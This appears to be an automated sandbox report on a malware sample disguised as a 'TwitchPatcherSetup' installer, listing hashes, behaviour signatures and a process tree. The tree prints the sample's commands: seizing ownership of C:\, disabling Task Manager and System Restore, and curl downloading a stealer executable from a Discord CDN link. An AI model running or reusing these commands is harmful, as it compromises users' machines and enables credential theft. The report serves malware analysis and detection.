C:\Users\Admin\AppData\Local\Temp\CabF069.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarF08B.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win10v2004-20240802-en

Max time kernel

99s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\melter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WScript.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3780 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe C:\Windows\system32\cmd.exe
PID 3780 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe C:\Windows\system32\cmd.exe
PID 4972 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4972 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4972 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4972 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4972 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4972 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4972 wrote to memory of 632 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 632 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4972 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4972 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4972 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4972 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4972 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4972 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4972 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4972 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 3616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 3616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe

"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\489D.tmp\489E.tmp\489F.bat C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\*.*

C:\Windows\system32\icacls.exe

Icacls C:\*.* /C /G Admin:F

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\curl.exe

curl "https://cdn.discordapp.com/attachments/1195864694343336009/1198255413704007800/cstealer.exe" --output salope.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

